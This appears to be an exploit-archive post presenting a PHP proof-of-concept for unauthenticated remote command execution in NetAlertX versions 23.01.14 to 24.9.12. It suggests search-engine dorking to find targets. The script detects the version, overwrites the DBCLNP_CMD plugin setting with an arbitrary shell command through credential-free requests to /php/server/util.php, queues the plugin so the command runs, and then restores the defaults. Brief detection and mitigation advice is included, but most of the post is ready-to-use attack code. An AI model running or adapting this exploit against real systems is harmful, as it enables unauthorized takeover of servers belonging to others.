=============================================================================================================================================
| # Title : NetAlertX 24.9.12 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://netalertx.com/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] An RCE (Remote Command Execution) exploit targeting NetAlertX, where an attacker can update settings without authentication, leading to command execution on the system.
[+] Affected range and mechanism, as shown by the code below: its version check treats releases 23.01.14 through 24.9.12 as vulnerable. It sends POST requests without credentials to /php/server/util.php; function=savesettings overwrites the DBCLNP_CMD plugin setting, and function=addToExecutionQueue then queues a run of that plugin, so the stored command is executed.
[+] Detection / mitigation: look for savesettings and addToExecutionQueue requests to /php/server/util.php from unauthenticated clients, and for a DBCLNP_CMD value that differs from the default db_cleanup script command; keep the web interface off untrusted networks and move to a release newer than 24.9.12 (confirm the fixed version with the vendor).
[+] Save code as poc.php.
[+] Usage : cmd => c:\www\test\php poc.php
[+] Set target = Line : 111
[+] PayLoad : (the opening of the listing, i.e. the NetAlertXExploit class declaration and the start of its constructor, is missing from this copy; the text resumes mid-constructor)
target = $target; $this->port = $port; $this->waitTime = $waitTime; $this->cleanup = $cleanup; $this->baseUrl = "http://$target:$port"; } private function sendRequest($method, $uri, $data = null) { $url = "{$this->baseUrl}$uri"; $options = [ 'http' => [ 'method' => $method, 'header' => "Content-Type: application/json\r\n", 'ignore_errors' => true ] ]; if ($data) { $options['http']['content'] = json_encode($data); } return file_get_contents($url, false, stream_context_create($options)); } public function check() { echo "[*] Checking if target is vulnerable...\n"; $res = $this->sendRequest("GET", "/maintenance.php"); if (!$res) { echo "[-] Target is not reachable.\n"; return false; } preg_match('/Installed version.*?([\d.]+)/', $res, $matches); if (!$matches) { echo "[-] Failed to detect version.\n"; return false; } $version = $matches[1]; if (version_compare($version, "23.01.14", ">=") && version_compare($version, "24.9.12", "<=")) { echo "[+] Vulnerable version detected: $version\n"; return true; } echo "[-] Target is not vulnerable (Version: $version).\n"; return false; } public function exploit($cmd) { echo "[*] Exploiting target...\n"; $payload
= "/bin/sh -c \"$cmd\""; $this->updateSettings($payload, "*"); echo "[*] Waiting for settings update...\n"; sleep($this->waitTime); echo "[*] Adding payload to execution queue...\n"; $this->addToExecutionQueue("run|DBCLNP"); $this->addToExecutionQueue("cron_restart_backend"); echo "[+] Payload sent successfully!\n"; } private function updateSettings($cmd, $schedule) { $data = [ 'function' => 'savesettings', 'settings' => [ ['DBCLNP', 'DBCLNP_RUN', 'string', 'schedule'], ['DBCLNP', 'DBCLNP_CMD', 'string', $cmd], ['DBCLNP', 'DBCLNP_RUN_SCHD', 'string', "$schedule * * * *"], ] ]; $res = $this->sendRequest("POST", "/php/server/util.php", $data); if (!$res) { die("[-] Failed to update settings.\n"); } echo "[+] DBCLNP_CMD updated to '$cmd'.\n"; } private function addToExecutionQueue($cmd) { $data = [ 'function' => 'addToExecutionQueue', 'action' => uniqid() . "|$cmd" ]; $res = $this->sendRequest("POST", "/php/server/util.php", $data); if (!$res) { die("[-] Failed to add payload to execution queue.\n"); } } public function cleanup() { if (!$this->cleanup) return; echo "[*] Restoring original settings...\n"; $defaultCmd = 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}'; $this->updateSettings($defaultCmd, "*/30"); echo "[+] Cleanup completed.\n"; } } // الاستخدام $target = "192.168.1.100"; $exploit = new NetAlertXExploit($target); if ($exploit->check()) { $exploit->exploit("id"); $exploit->cleanup(); } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================